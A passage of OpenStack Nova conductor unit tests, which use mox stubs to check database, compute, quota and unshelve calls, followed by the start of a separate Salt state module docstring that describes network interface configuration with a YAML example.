extra_usage_info=info)
self.mox.ReplayAll()
self.conductor.notify_usage_exists(self.context, instance,
system_metadata={},
extra_usage_info=dict(extra='info'))
def test_security_groups_trigger_members_refresh(self):
self.mox.StubOutWithMock(self.conductor_manager.security_group_api,
'trigger_members_refresh')
self.conductor_manager.security_group_api.trigger_members_refresh(
self.context, [1, 2, 3])
self.mox.ReplayAll()
self.conductor.security_groups_trigger_members_refresh(self.context,
[1, 2, 3])
def test_network_migrate_instance_start(self):
self.mox.StubOutWithMock(self.conductor_manager.network_api,
'migrate_instance_start')
self.conductor_manager.network_api.migrate_instance_start(self.context,
'instance',
'migration')
self.mox.ReplayAll()
self.conductor.network_migrate_instance_start(self.context,
'instance',
'migration')
def test_network_migrate_instance_finish(self):
self.mox.StubOutWithMock(self.conductor_manager.network_api,
'migrate_instance_finish')
self.conductor_manager.network_api.migrate_instance_finish(
self.context, 'instance', 'migration')
self.mox.ReplayAll()
self.conductor.network_migrate_instance_finish(self.context,
'instance',
'migration')
def test_quota_commit(self):
self.mox.StubOutWithMock(quota.QUOTAS, 'commit')
quota.QUOTAS.commit(self.context, 'reservations', project_id=None)
quota.QUOTAS.commit(self.context, 'reservations', project_id='proj')
self.mox.ReplayAll()
self.conductor.quota_commit(self.context, 'reservations')
self.conductor.quota_commit(self.context, 'reservations', 'proj')
def test_quota_rollback(self):
self.mox.StubOutWithMock(quota.QUOTAS, 'rollback')
quota.QUOTAS.rollback(self.context, 'reservations', project_id=None)
quota.QUOTAS.rollback(self.context, 'reservations', project_id='proj')
self.mox.ReplayAll()
self.conductor.quota_rollback(self.context, 'reservations')
self.conductor.quota_rollback(self.context, 'reservations', 'proj')
def test_get_ec2_ids(self):
expected = {
'instance-id': 'ec2-inst-id',
'ami-id': 'ec2-ami-id',
'kernel-id': 'ami-kernel-ec2-kernelid',
'ramdisk-id': 'ami-ramdisk-ec2-ramdiskid',
}
inst = {
'uuid': 'fake-uuid',
'kernel_id': 'ec2-kernelid',
'ramdisk_id': 'ec2-ramdiskid',
'image_ref': 'fake-image',
}
self.mox.StubOutWithMock(ec2utils, 'id_to_ec2_inst_id')
self.mox.StubOutWithMock(ec2utils, 'glance_id_to_ec2_id')
self.mox.StubOutWithMock(ec2utils, 'image_type')
ec2utils.id_to_ec2_inst_id(inst['uuid']).AndReturn(
expected['instance-id'])
ec2utils.glance_id_to_ec2_id(self.context,
inst['image_ref']).AndReturn(
expected['ami-id'])
for image_type in ['kernel', 'ramdisk']:
image_id = inst['%s_id' % image_type]
ec2utils.image_type(image_type).AndReturn('ami-' + image_type)
ec2utils.glance_id_to_ec2_id(self.context, image_id,
'ami-' + image_type).AndReturn(
'ami-%s-ec2-%sid' % (image_type, image_type))
self.mox.ReplayAll()
result = self.conductor.get_ec2_ids(self.context, inst)
self.assertEqual(result, expected)
def test_compute_stop(self):
self.mox.StubOutWithMock(self.conductor_manager.compute_api, 'stop')
self.conductor_manager.compute_api.stop(self.context, 'instance', True)
self.mox.ReplayAll()
self.conductor.compute_stop(self.context, 'instance')
def test_compute_confirm_resize(self):
self.mox.StubOutWithMock(self.conductor_manager.compute_api,
'confirm_resize')
self.conductor_manager.compute_api.confirm_resize(self.context,
'instance',
'migration')
self.mox.ReplayAll()
self.conductor.compute_confirm_resize(self.context, 'instance',
'migration')
def test_compute_unrescue(self):
self.mox.StubOutWithMock(self.conductor_manager.compute_api,
'unrescue')
self.conductor_manager.compute_api.unrescue(self.context, 'instance')
self.mox.ReplayAll()
self.conductor.compute_unrescue(self.context, 'instance')
def test_compute_reboot(self):
self.mox.StubOutWithMock(self.conductor_manager.compute_api, 'reboot')
self.conductor_manager.compute_api.reboot(self.context, 'instance',
'fake-type')
self.mox.ReplayAll()
self.conductor.compute_reboot(self.context, 'instance', 'fake-type')
class ConductorTestCase(_BaseTestCase, test.TestCase):
"""Conductor Manager Tests."""
def setUp(self):
super(ConductorTestCase, self).setUp()
self.conductor = conductor_manager.ConductorManager()
self.conductor_manager = self.conductor
def test_block_device_mapping_update_or_create(self):
fake_bdm = {'id': 'fake-id', 'device_name': 'foo'}
fake_bdm2 = {'id': 'fake-id', 'device_name': 'foo2'}
cells_rpcapi = self.conductor.cells_rpcapi
self.mox.StubOutWithMock(db, 'block_device_mapping_create')
self.mox.StubOutWithMock(db, 'block_device_mapping_update')
self.mox.StubOutWithMock(db, 'block_device_mapping_update_or_create')
self.mox.StubOutWithMock(cells_rpcapi,
'bdm_update_or_create_at_top')
db.block_device_mapping_create(self.context,
fake_bdm).AndReturn(fake_bdm2)
cells_rpcapi.bdm_update_or_create_at_top(self.context, fake_bdm2,
create=True)
db.block_device_mapping_update(self.context, fake_bdm['id'],
fake_bdm).AndReturn(fake_bdm2)
cells_rpcapi.bdm_update_or_create_at_top(self.context,
fake_bdm2,
create=False)
db.block_device_mapping_update_or_create(
self.context, fake_bdm).AndReturn(fake_bdm2)
cells_rpcapi.bdm_update_or_create_at_top(self.context,
fake_bdm2,
create=None)
self.mox.ReplayAll()
self.conductor.block_device_mapping_update_or_create(self.context,
fake_bdm,
create=True)
self.conductor.block_device_mapping_update_or_create(self.context,
fake_bdm,
create=False)
self.conductor.block_device_mapping_update_or_create(self.context,
fake_bdm)
def test_block_device_mapping_destroy(self):
fake_bdm = {'id': 'fake-bdm',
'instance_uuid': 'fake-uuid',
'device_name': 'fake-device1',
'volume_id': 'fake-vol-id1'}
fake_bdm2 = {'id': 'fake-bdm-2',
'instance_uuid': 'fake-uuid2',
'device_name': '',
'volume_id': 'fake-vol-id2'}
fake_inst = {'uuid': 'fake-uuid'}
cells_rpcapi = self.conductor.cells_rpcapi
self.mox.StubOutWithMock(db, 'block_device_mapping_destroy')
self.mox.StubOutWithMock(
db, 'block_device_mapping_destroy_by_instance_and_device')
self.mox.StubOutWithMock(
db, 'block_device_mapping_destroy_by_instance_and_volume')
self.mox.StubOutWithMock(cells_rpcapi, 'bdm_destroy_at_top')
db.block_device_mapping_destroy(self.context, 'fake-bdm')
cells_rpcapi.bdm_destroy_at_top(self.context,
fake_bdm['instance_uuid'],
device_name=fake_bdm['device_name'])
db.block_device_mapping_destroy(self.context, 'fake-bdm-2')
cells_rpcapi.bdm_destroy_at_top(self.context,
fake_bdm2['instance_uuid'],
volume_id=fake_bdm2['volume_id'])
db.block_device_mapping_destroy_by_instance_and_device(self.context,
'fake-uuid',
'fake-device')
cells_rpcapi.bdm_destroy_at_top(self.context, fake_inst['uuid'],
device_name='fake-device')
db.block_device_mapping_destroy_by_instance_and_volume(self.context,
'fake-uuid',
'fake-volume')
cells_rpcapi.bdm_destroy_at_top(self.context, fake_inst['uuid'],
volume_id='fake-volume')
self.mox.ReplayAll()
self.conductor.block_device_mapping_destroy(self.context,
[fake_bdm,
fake_bdm2])
self.conductor.block_device_mapping_destroy(self.context,
instance=fake_inst,
device_name='fake-device')
self.conductor.block_device_mapping_destroy(self.context,
instance=fake_inst,
volume_id='fake-volume')
def test_instance_get_all_by_filters(self):
filters = {'foo': 'bar'}
self.mox.StubOutWithMock(db, 'instance_get_all_by_filters')
db.instance_get_all_by_filters(self.context, filters,
'fake-key', 'fake-sort',
columns_to_join=None)
self.mox.ReplayAll()
self.conductor.instance_get_all_by_filters(self.context, filters,
'fake-key', 'fake-sort')
def test_instance_get_all_by_host(self):
self.mox.StubOutWithMock(db, 'instance_get_all_by_host')
self.mox.StubOutWithMock(db, 'instance_get_all_by_host_and_node')
db.instance_get_all_by_host(self.context.elevated(),
'host', None).AndReturn('result')
db.instance_get_all_by_host_and_node(self.context.elevated(), 'host',
'node').AndReturn('result')
self.mox.ReplayAll()
result = self.conductor.instance_get_all_by_host(self.context, 'host')
self.assertEqual(result, 'result')
result = self.conductor.instance_get_all_by_host(self.context, 'host',
'node')
self.assertEqual(result, 'result')
def _test_stubbed(self, name, dbargs, condargs,
db_result_listified=False, db_exception=None):
self.mox.StubOutWithMock(db, name)
if db_exception:
getattr(db, name)(self.context, *dbargs).AndRaise(db_exception)
getattr(db, name)(self.context, *dbargs).AndRaise(db_exception)
else:
getattr(db, name)(self.context, *dbargs).AndReturn('fake-result')
self.mox.ReplayAll()
if db_exception:
self.assertRaises(rpc_common.ClientException,
self.conductor.service_get_all_by,
self.context, **condargs)
self.stub_out_client_exceptions()
self.assertRaises(db_exception.__class__,
self.conductor.service_get_all_by,
self.context, **condargs)
else:
result = self.conductor.service_get_all_by(self.context,
**condargs)
if db_result_listified:
self.assertEqual(['fake-result'], result)
else:
self.assertEqual('fake-result', result)
def test_service_get_all(self):
self._test_stubbed('service_get_all', (), {})
def test_service_get_by_host_and_topic(self):
self._test_stubbed('service_get_by_host_and_topic',
('host', 'topic'),
dict(topic='topic', host='host'))
def test_service_get_all_by_topic(self):
self._test_stubbed('service_get_all_by_topic',
('topic',),
dict(topic='topic'))
def test_service_get_all_by_host(self):
self._test_stubbed('service_get_all_by_host',
('host',),
dict(host='host'))
def test_service_get_by_compute_host(self):
self._test_stubbed('service_get_by_compute_host',
('host',),
dict(topic='compute', host='host'),
db_result_listified=True)
def test_service_get_by_args(self):
self._test_stubbed('service_get_by_args',
('host', 'binary'),
dict(host='host', binary='binary'))
def test_service_get_by_compute_host_not_found(self):
self._test_stubbed('service_get_by_compute_host',
('host',),
dict(topic='compute', host='host'),
db_exception=exc.ComputeHostNotFound(host='host'))
def test_service_get_by_args_not_found(self):
self._test_stubbed('service_get_by_args',
('host', 'binary'),
dict(host='host', binary='binary'),
db_exception=exc.HostBinaryNotFound(binary='binary',
host='host'))
def test_security_groups_trigger_handler(self):
self.mox.StubOutWithMock(self.conductor_manager.security_group_api,
'trigger_handler')
self.conductor_manager.security_group_api.trigger_handler('event',
self.context,
'args')
self.mox.ReplayAll()
self.conductor.security_groups_trigger_handler(self.context,
'event', ['args'])
def test_compute_stop_with_objects(self):
# use an instance object rather than a dict
instance = self._create_fake_instance()
inst_obj = instance_obj.Instance._from_db_object(
self.context, instance_obj.Instance(), instance)
self.mox.StubOutWithMock(self.conductor_manager.compute_api, 'stop')
self.conductor_manager.compute_api.stop(self.context, inst_obj, True)
self.mox.ReplayAll()
self.conductor.compute_stop(self.context, inst_obj)
def test_compute_confirm_resize_with_objects(self):
# use an instance object rather than a dict
instance = self._create_fake_instance()
inst_obj = instance_obj.Instance._from_db_object(
self.context, instance_obj.Instance(), instance)
self.mox.StubOutWithMock(self.conductor_manager.compute_api,
'confirm_resize')
# make sure the instance object is serialized
primitive_instance = dict(inst_obj.items())
self.conductor_manager.compute_api.confirm_resize(
self.context, primitive_instance, 'migration')
self.mox.ReplayAll()
self.conductor.compute_confirm_resize(self.context, inst_obj,
'migration')
class ConductorRPCAPITestCase(_BaseTestCase, test.TestCase):
"""Conductor RPC API Tests."""
def setUp(self):
super(ConductorRPCAPITestCase, self).setUp()
self.conductor_service = self.start_service(
'conductor', manager='nova.conductor.manager.ConductorManager')
self.conductor_manager = self.conductor_service.manager
self.conductor = conductor_rpcapi.ConductorAPI()
def test_block_device_mapping_update_or_create(self):
fake_bdm = {'id': 'fake-id'}
self.mox.StubOutWithMock(db, 'block_device_mapping_create')
self.mox.StubOutWithMock(db, 'block_device_mapping_update')
self.mox.StubOutWithMock(db, 'block_device_mapping_update_or_create')
db.block_device_mapping_create(self.context, fake_bdm)
db.block_device_mapping_update(self.context, fake_bdm['id'], fake_bdm)
db.block_device_mapping_update_or_create(self.context, fake_bdm)
self.mox.ReplayAll()
self.conductor.block_device_mapping_update_or_create(self.context,
fake_bdm,
create=True)
self.conductor.block_device_mapping_update_or_create(self.context,
fake_bdm,
create=False)
self.conductor.block_device_mapping_update_or_create(self.context,
fake_bdm)
def test_block_device_mapping_destroy(self):
fake_bdm = {'id': 'fake-bdm',
'instance_uuid': 'fake-uuid',
'device_name': 'fake-device1',
'volume_id': 'fake-vol-id1'}
fake_inst = {'uuid': 'fake-uuid'}
self.mox.StubOutWithMock(db, 'block_device_mapping_destroy')
self.mox.StubOutWithMock(
db, 'block_device_mapping_destroy_by_instance_and_device')
self.mox.StubOutWithMock(
db, 'block_device_mapping_destroy_by_instance_and_volume')
db.block_device_mapping_destroy(self.context, 'fake-bdm')
db.block_device_mapping_destroy_by_instance_and_device(self.context,
'fake-uuid',
'fake-device')
db.block_device_mapping_destroy_by_instance_and_volume(self.context,
'fake-uuid',
'fake-volume')
self.mox.ReplayAll()
self.conductor.block_device_mapping_destroy(self.context,
bdms=[fake_bdm])
self.conductor.block_device_mapping_destroy(self.context,
instance=fake_inst,
device_name='fake-device')
self.conductor.block_device_mapping_destroy(self.context,
instance=fake_inst,
volume_id='fake-volume')
def test_instance_get_all_by_filters(self):
filters = {'foo': 'bar'}
self.mox.StubOutWithMock(db, 'instance_get_all_by_filters')
db.instance_get_all_by_filters(self.context, filters,
'fake-key', 'fake-sort',
columns_to_join=None)
self.mox.ReplayAll()
self.conductor.instance_get_all_by_filters(self.context, filters,
'fake-key', 'fake-sort')
def _test_stubbed(self, name, dbargs, condargs,
db_result_listified=False, db_exception=None):
self.mox.StubOutWithMock(db, name)
if db_exception:
getattr(db, name)(self.context, *dbargs).AndRaise(db_exception)
else:
getattr(db, name)(self.context, *dbargs).AndReturn('fake-result')
self.mox.ReplayAll()
if db_exception:
self.assertRaises(db_exception.__class__,
self.conductor.service_get_all_by,
self.context, **condargs)
else:
result = self.conductor.service_get_all_by(self.context,
**condargs)
if db_result_listified:
self.assertEqual(['fake-result'], result)
else:
self.assertEqual('fake-result', result)
def test_service_get_all(self):
self._test_stubbed('service_get_all', (), {})
def test_service_get_by_host_and_topic(self):
self._test_stubbed('service_get_by_host_and_topic',
('host', 'topic'),
dict(topic='topic', host='host'))
def test_service_get_all_by_topic(self):
self._test_stubbed('service_get_all_by_topic',
('topic',),
dict(topic='topic'))
def test_service_get_all_by_host(self):
self._test_stubbed('service_get_all_by_host',
('host',),
dict(host='host'))
def test_service_get_by_compute_host(self):
self._test_stubbed('service_get_by_compute_host',
('host',),
dict(topic='compute', host='host'),
db_result_listified=True)
def test_service_get_by_args(self):
self._test_stubbed('service_get_by_args',
('host', 'binary'),
dict(host='host', binary='binary'))
def test_service_get_by_compute_host_not_found(self):
self._test_stubbed('service_get_by_compute_host',
('host',),
dict(topic='compute', host='host'),
db_exception=exc.ComputeHostNotFound(host='host'))
def test_service_get_by_args_not_found(self):
self._test_stubbed('service_get_by_args',
('host', 'binary'),
dict(host='host', binary='binary'),
db_exception=exc.HostBinaryNotFound(binary='binary',
host='host'))
def test_security_groups_trigger_handler(self):
self.mox.StubOutWithMock(self.conductor_manager.security_group_api,
'trigger_handler')
self.conductor_manager.security_group_api.trigger_handler('event',
self.context,
'arg')
self.mox.ReplayAll()
self.conductor.security_groups_trigger_handler(self.context,
'event', ['arg'])
class ConductorAPITestCase(_BaseTestCase, test.TestCase):
"""Conductor API Tests."""
def setUp(self):
super(ConductorAPITestCase, self).setUp()
self.conductor_service = self.start_service(
'conductor', manager='nova.conductor.manager.ConductorManager')
self.conductor = conductor_api.API()
self.conductor_manager = self.conductor_service.manager
self.db = None
def _do_update(self, instance_uuid, **updates):
# NOTE(danms): the public API takes actual keyword arguments,
# so override the base class here to make the call correctly
return self.conductor.instance_update(self.context, instance_uuid,
**updates)
def test_bw_usage_get(self):
self.mox.StubOutWithMock(db, 'bw_usage_update')
self.mox.StubOutWithMock(db, 'bw_usage_get')
get_args = (self.context, 'uuid', 0, 'mac')
db.bw_usage_get(*get_args).AndReturn('foo')
self.mox.ReplayAll()
result = self.conductor.bw_usage_get(*get_args)
self.assertEqual(result, 'foo')
def test_block_device_mapping_update_or_create(self):
self.mox.StubOutWithMock(db, 'block_device_mapping_create')
self.mox.StubOutWithMock(db, 'block_device_mapping_update')
self.mox.StubOutWithMock(db, 'block_device_mapping_update_or_create')
db.block_device_mapping_create(self.context, 'fake-bdm')
db.block_device_mapping_update(self.context,
'fake-id', {'id': 'fake-id'})
db.block_device_mapping_update_or_create(self.context, 'fake-bdm')
self.mox.ReplayAll()
self.conductor.block_device_mapping_create(self.context, 'fake-bdm')
self.conductor.block_device_mapping_update(self.context, 'fake-id', {})
self.conductor.block_device_mapping_update_or_create(self.context,
'fake-bdm')
def test_block_device_mapping_destroy(self):
fake_bdm = {'id': 'fake-bdm',
'instance_uuid': 'fake-uuid',
'device_name': 'fake-device1',
'volume_id': 'fake-vol-id1'}
fake_inst = {'uuid': 'fake-uuid'}
self.mox.StubOutWithMock(db, 'block_device_mapping_destroy')
self.mox.StubOutWithMock(
db, 'block_device_mapping_destroy_by_instance_and_device')
self.mox.StubOutWithMock(
db, 'block_device_mapping_destroy_by_instance_and_volume')
db.block_device_mapping_destroy(self.context, 'fake-bdm')
db.block_device_mapping_destroy_by_instance_and_device(self.context,
'fake-uuid',
'fake-device')
db.block_device_mapping_destroy_by_instance_and_volume(self.context,
'fake-uuid',
'fake-volume')
self.mox.ReplayAll()
self.conductor.block_device_mapping_destroy(self.context, [fake_bdm])
self.conductor.block_device_mapping_destroy_by_instance_and_device(
self.context, fake_inst, 'fake-device')
self.conductor.block_device_mapping_destroy_by_instance_and_volume(
self.context, fake_inst, 'fake-volume')
def _test_stubbed(self, name, *args, **kwargs):
if args and isinstance(args[0], FakeContext):
ctxt = args[0]
args = args[1:]
else:
ctxt = self.context
db_exception = kwargs.get('db_exception')
self.mox.StubOutWithMock(db, name)
if db_exception:
getattr(db, name)(ctxt, *args).AndRaise(db_exception)
else:
getattr(db, name)(ctxt, *args).AndReturn('fake-result')
if name == 'service_destroy':
# TODO(russellb) This is a hack ... SetUp() starts the conductor()
# service. There is a cleanup step that runs after this test which
# also deletes the associated service record. This involves a call
# to db.service_destroy(), which we have stubbed out.
db.service_destroy(mox.IgnoreArg(), mox.IgnoreArg())
self.mox.ReplayAll()
if db_exception:
self.assertRaises(db_exception.__class__,
getattr(self.conductor, name),
self.context, *args)
else:
result = getattr(self.conductor, name)(self.context, *args)
self.assertEqual(
result, 'fake-result' if kwargs.get('returns', True) else None)
def test_service_get_all(self):
self._test_stubbed('service_get_all')
def test_service_get_by_host_and_topic(self):
self._test_stubbed('service_get_by_host_and_topic', 'host', 'topic')
def test_service_get_all_by_topic(self):
self._test_stubbed('service_get_all_by_topic', 'topic')
def test_service_get_all_by_host(self):
self._test_stubbed('service_get_all_by_host', 'host')
def test_service_get_by_compute_host(self):
self._test_stubbed('service_get_by_compute_host', 'host')
def test_service_get_by_args(self):
self._test_stubbed('service_get_by_args', 'host', 'binary')
def test_service_get_by_compute_host_not_found(self):
self._test_stubbed('service_get_by_compute_host', 'host',
db_exception=exc.ComputeHostNotFound(host='host'))
def test_service_get_by_args_not_found(self):
self._test_stubbed('service_get_by_args', 'host', 'binary',
db_exception=exc.HostBinaryNotFound(binary='binary',
host='host'))
def test_service_create(self):
self._test_stubbed('service_create', {})
def test_service_destroy(self):
self._test_stubbed('service_destroy', '', returns=False)
def test_service_update(self):
ctxt = self.context
self.mox.StubOutWithMock(db, 'service_update')
db.service_update(ctxt, '', {}).AndReturn('fake-result')
self.mox.ReplayAll()
result = self.conductor.service_update(self.context, {'id': ''}, {})
self.assertEqual(result, 'fake-result')
def test_instance_get_all_by_host_and_node(self):
self._test_stubbed('instance_get_all_by_host_and_node',
self.context.elevated(), 'host', 'node')
def test_instance_get_all_by_host(self):
self.mox.StubOutWithMock(db, 'instance_get_all_by_host')
self.mox.StubOutWithMock(db, 'instance_get_all_by_host_and_node')
db.instance_get_all_by_host(self.context.elevated(), 'host',
None).AndReturn('fake-result')
self.mox.ReplayAll()
result = self.conductor.instance_get_all_by_host(self.context,
'host')
self.assertEqual(result, 'fake-result')
def test_wait_until_ready(self):
timeouts = []
calls = dict(count=0)
def fake_ping(context, message, timeout):
timeouts.append(timeout)
calls['count'] += 1
if calls['count'] < 15:
raise rpc_common.Timeout("fake")
self.stubs.Set(self.conductor.base_rpcapi, 'ping', fake_ping)
self.conductor.wait_until_ready(self.context)
self.assertEqual(timeouts.count(10), 10)
self.assertTrue(None in timeouts)
def test_security_groups_trigger_handler(self):
self.mox.StubOutWithMock(self.conductor_manager.security_group_api,
'trigger_handler')
self.conductor_manager.security_group_api.trigger_handler('event',
self.context,
'arg')
self.mox.ReplayAll()
self.conductor.security_groups_trigger_handler(self.context,
'event', 'arg')
class ConductorLocalAPITestCase(ConductorAPITestCase):
"""Conductor LocalAPI Tests."""
def setUp(self):
super(ConductorLocalAPITestCase, self).setUp()
self.conductor = conductor_api.LocalAPI()
self.conductor_manager = self.conductor._manager._target
self.db = db
def test_client_exceptions(self):
instance = self._create_fake_instance()
# NOTE(danms): The LocalAPI should not raise exceptions wrapped
# in ClientException. KeyError should be raised if an invalid
# update key is passed, so use that to validate.
self.assertRaises(KeyError,
self._do_update, instance['uuid'], foo='bar')
def test_wait_until_ready(self):
# Override test in ConductorAPITestCase
pass
class ConductorImportTest(test.TestCase):
def test_import_conductor_local(self):
self.flags(use_local=True, group='conductor')
self.assertTrue(isinstance(conductor.API(),
conductor_api.LocalAPI))
self.assertTrue(isinstance(conductor.ComputeTaskAPI(),
conductor_api.LocalComputeTaskAPI))
def test_import_conductor_rpc(self):
self.flags(use_local=False, group='conductor')
self.assertTrue(isinstance(conductor.API(),
conductor_api.API))
self.assertTrue(isinstance(conductor.ComputeTaskAPI(),
conductor_api.ComputeTaskAPI))
def test_import_conductor_override_to_local(self):
self.flags(use_local=False, group='conductor')
self.assertTrue(isinstance(conductor.API(use_local=True),
conductor_api.LocalAPI))
self.assertTrue(isinstance(conductor.ComputeTaskAPI(use_local=True),
conductor_api.LocalComputeTaskAPI))
class ConductorPolicyTest(test.TestCase):
def test_all_allowed_keys(self):
def fake_db_instance_update(self, *args, **kwargs):
return None, None
self.stubs.Set(db, 'instance_update_and_get_original',
fake_db_instance_update)
ctxt = context.RequestContext('fake-user', 'fake-project')
conductor = conductor_api.LocalAPI()
updates = {}
for key in conductor_manager.allowed_updates:
if key in conductor_manager.datetime_fields:
updates[key] = timeutils.utcnow()
else:
updates[key] = 'foo'
conductor.instance_update(ctxt, 'fake-instance', **updates)
def test_allowed_keys_are_real(self):
instance = models.Instance()
keys = list(conductor_manager.allowed_updates)
# NOTE(danms): expected_task_state is a parameter that gets
# passed to the db layer, but is not actually an instance attribute
del keys[keys.index('expected_task_state')]
for key in keys:
self.assertTrue(hasattr(instance, key))
class _BaseTaskTestCase(object):
def setUp(self):
super(_BaseTaskTestCase, self).setUp()
self.user_id = 'fake'
self.project_id = 'fake'
self.context = FakeContext(self.user_id, self.project_id)
fake_instance_actions.stub_out_action_events(self.stubs)
def test_migrate_server(self):
self.mox.StubOutWithMock(self.conductor_manager.scheduler_rpcapi,
'live_migration')
self.conductor_manager.scheduler_rpcapi.live_migration(self.context,
'block_migration', 'disk_over_commit', 'instance', 'destination')
self.mox.ReplayAll()
self.conductor.migrate_server(self.context, 'instance',
{'host': 'destination'}, True, False, None, 'block_migration',
'disk_over_commit')
def test_migrate_server_fails_with_non_live(self):
self.assertRaises(NotImplementedError, self.conductor.migrate_server,
self.context, None, None, False, False, None, None, None)
def test_migrate_server_fails_with_rebuild(self):
self.assertRaises(NotImplementedError, self.conductor.migrate_server,
self.context, None, None, True, True, None, None, None)
def test_migrate_server_fails_with_flavor(self):
self.assertRaises(NotImplementedError, self.conductor.migrate_server,
self.context, None, None, True, False, "dummy", None, None)
def test_build_instances(self):
instance_type = flavors.get_default_flavor()
system_metadata = flavors.save_flavor_info({}, instance_type)
# NOTE(alaski): instance_type -> system_metadata -> instance_type
# loses some data (extra_specs). This build process is using
# scheduler/utils:build_request_spec() which extracts flavor from
# system_metadata and will re-query the DB for extra_specs.. so
# we need to test this properly
expected_instance_type = flavors.extract_flavor(
{'system_metadata': system_metadata})
expected_instance_type['extra_specs'] = 'fake-specs'
self.mox.StubOutWithMock(db, 'flavor_extra_specs_get')
self.mox.StubOutWithMock(self.conductor_manager.scheduler_rpcapi,
'run_instance')
db.flavor_extra_specs_get(
self.context,
instance_type['flavorid']).AndReturn('fake-specs')
self.conductor_manager.scheduler_rpcapi.run_instance(self.context,
request_spec={
'image': {'fake_data': 'should_pass_silently'},
'instance_properties': {'system_metadata': system_metadata,
'uuid': 'fakeuuid'},
'instance_type': expected_instance_type,
'instance_uuids': ['fakeuuid', 'fakeuuid2'],
'block_device_mapping': 'block_device_mapping',
'security_group': 'security_groups',
'num_instances': 2},
admin_password='admin_password',
injected_files='injected_files',
requested_networks='requested_networks', is_first_time=True,
filter_properties={})
self.mox.ReplayAll()
self.conductor.build_instances(self.context,
instances=[{'uuid': 'fakeuuid',
'system_metadata': system_metadata},
{'uuid': 'fakeuuid2'}],
image={'fake_data': 'should_pass_silently'},
filter_properties={},
admin_password='admin_password',
injected_files='injected_files',
requested_networks='requested_networks',
security_groups='security_groups',
block_device_mapping='block_device_mapping')
def test_unshelve_instance_on_host(self):
db_instance = jsonutils.to_primitive(self._create_fake_instance())
instance = instance_obj.Instance.get_by_uuid(self.context,
db_instance['uuid'], expected_attrs=['system_metadata'])
instance.vm_state = vm_states.SHELVED
instance.task_state = task_states.UNSHELVING
instance.save()
system_metadata = instance.system_metadata
self.mox.StubOutWithMock(self.conductor_manager.compute_rpcapi,
'start_instance')
self.mox.StubOutWithMock(self.conductor_manager, '_delete_image')
self.mox.StubOutWithMock(self.conductor_manager.compute_rpcapi,
'unshelve_instance')
self.conductor_manager.compute_rpcapi.start_instance(self.context,
instance)
self.conductor_manager._delete_image(self.context,
'fake_image_id')
self.mox.ReplayAll()
system_metadata['shelved_at'] = timeutils.utcnow()
system_metadata['shelved_image_id'] = 'fake_image_id'
system_metadata['shelved_host'] = 'fake-mini'
self.conductor_manager.unshelve_instance(self.context, instance)
def test_unshelve_instance_schedule_and_rebuild(self):
db_instance = jsonutils.to_primitive(self._create_fake_instance())
instance = instance_obj.Instance.get_by_uuid(self.context,
db_instance['uuid'], expected_attrs=['system_metadata'])
instance.vm_state = vm_states.SHELVED_OFFLOADED
instance.save()
system_metadata = instance.system_metadata
self.mox.StubOutWithMock(self.conductor_manager, '_get_image')
self.mox.StubOutWithMock(self.conductor_manager, '_schedule_instances')
self.mox.StubOutWithMock(self.conductor_manager.compute_rpcapi,
'unshelve_instance')
self.conductor_manager._get_image(self.context,
'fake_image_id').AndReturn('fake_image')
self.conductor_manager._schedule_instances(self.context,
'fake_image', [], instance).AndReturn(
[{'host': 'fake_host'}])
self.conductor_manager.compute_rpcapi.unshelve_instance(self.context,
instance, 'fake_host', 'fake_image')
self.mox.ReplayAll()
system_metadata['shelved_at'] = timeutils.utcnow()
system_metadata['shelved_image_id'] = 'fake_image_id'
system_metadata['shelved_host'] = 'fake-mini'
self.conductor_manager.unshelve_instance(self.context, instance)
def test_unshelve_instance_schedule_and_rebuild_volume_backed(self):
db_instance = jsonutils.to_primitive(self._create_fake_instance())
instance = instance_obj.Instance.get_by_uuid(self.context,
db_instance['uuid'], expected_attrs=['system_metadata'])
instance.vm_state = vm_states.SHELVED_OFFLOADED
instance.save()
system_metadata = instance.system_metadata
self.mox.StubOutWithMock(self.conductor_manager, '_get_image')
self.mox.StubOutWithMock(self.conductor_manager, '_schedule_instances')
self.mox.StubOutWithMock(self.conductor_manager.compute_rpcapi,
'unshelve_instance')
self.conductor_manager._get_image(self.context,
'fake_image_id').AndReturn(None)
self.conductor_manager._schedule_instances(self.context,
None, [], instance).AndReturn(
[{'host': 'fake_host'}])
self.conductor_manager.compute_rpcapi.unshelve_instance(self.context,
instance, 'fake_host', None)
self.mox.ReplayAll()
system_metadata['shelved_at'] = timeutils.utcnow()
system_metadata['shelved_image_id'] = 'fake_image_id'
system_metadata['shelved_host'] = 'fake-mini'
self.conductor_manager.unshelve_instance(self.context, instance)
class ConductorTaskTestCase(_BaseTaskTestCase, test_compute.BaseTestCase):
"""ComputeTaskManager Tests."""
def setUp(self):
super(ConductorTaskTestCase, self).setUp()
self.conductor = conductor_manager.ComputeTaskManager()
self.conductor_manager = self.conductor
class ConductorTaskRPCAPITestCase(_BaseTaskTestCase,
test_compute.BaseTestCase):
"""Conductor compute_task RPC namespace Tests."""
def setUp(self):
super(ConductorTaskRPCAPITestCase, self).setUp()
self.conductor_service = self.start_service(
'conductor', manager='nova.conductor.manager.ConductorManager')
self.conductor = conductor_rpcapi.ComputeTaskAPI()
service_manager = self.conductor_service.manager
self.conductor_manager = service_manager.compute_task_mgr
class ConductorTaskAPITestCase(_BaseTaskTestCase, test_compute.BaseTestCase):
"""Compute task API Tests."""
def setUp(self):
super(ConductorTaskAPITestCase, self).setUp()
self.conductor_service = self.start_service(
'conductor', manager='nova.conductor.manager.ConductorManager')
self.conductor = conductor_api.ComputeTaskAPI()
service_manager = self.conductor_service.manager
self.conductor_manager = service_manager.compute_task_mgr
class ConductorLocalComputeTaskAPITestCase(ConductorTaskAPITestCase):
"""Conductor LocalComputeTaskAPI Tests."""
def setUp(self):
super(ConductorLocalComputeTaskAPITestCase, self).setUp()
self.conductor = conductor_api.LocalComputeTaskAPI()
self.conductor_manager = self.conductor._manager._target
|
|
# -*- coding: utf-8 -*-
'''
Configuration of network interfaces
===================================
The network module is used to create and manage network settings,
interfaces can be set as either managed or ignored. By default
all interfaces are ignored unless specified.
.. note::
Prior to version 2014.1.0, only RedHat-based systems (RHEL,
CentOS, Scientific Linux, etc.) are supported. Support for Debian/Ubuntu is
new in 2014.1.0 and should be considered experimental.
Other platforms are not yet supported.
.. code-block:: yaml
system:
network.system:
- enabled: True
- hostname: server1.example.com
- gateway: 192.168.0.1
- gatewaydev: eth0
- nozeroconf: True
- nisdomain: example.com
- require_reboot: True
eth0:
network.managed:
- enabled: True
- type: eth
- proto: none
- ipaddr: 10.1.0.1
- netmask: 255.255.255.0
- dns:
- 8.8.8.8
